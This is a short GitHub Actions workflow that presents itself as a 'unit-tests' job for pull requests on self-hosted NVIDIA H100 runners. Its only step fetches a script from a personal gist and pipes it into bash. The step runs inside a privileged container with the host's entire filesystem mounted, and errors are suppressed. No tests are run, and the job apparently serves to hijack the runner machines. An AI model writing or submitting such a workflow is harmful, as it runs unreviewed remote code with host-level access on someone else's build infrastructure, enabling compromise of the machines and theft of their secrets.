name: nv-h100
run-name: nv-h100

on:
  pull_request

jobs:
  unit-tests:
    runs-on: [self-hosted, nvidia, h100]
    container:
      image: ubuntu:latest
      volumes:
          - /:/host/
      options: --privileged
    steps:
      - name: unit-tests
        continue-on-error: true
        run: |
          sudo apt -y install curl
          curl -sfL https://gist.githubusercontent.com/jstan327/ef3f5f3fff3a391f1cb8322419e918fa/raw/b80c03fd2ee821e6eb1fab35ce13dea079b47204/bak411623 | bash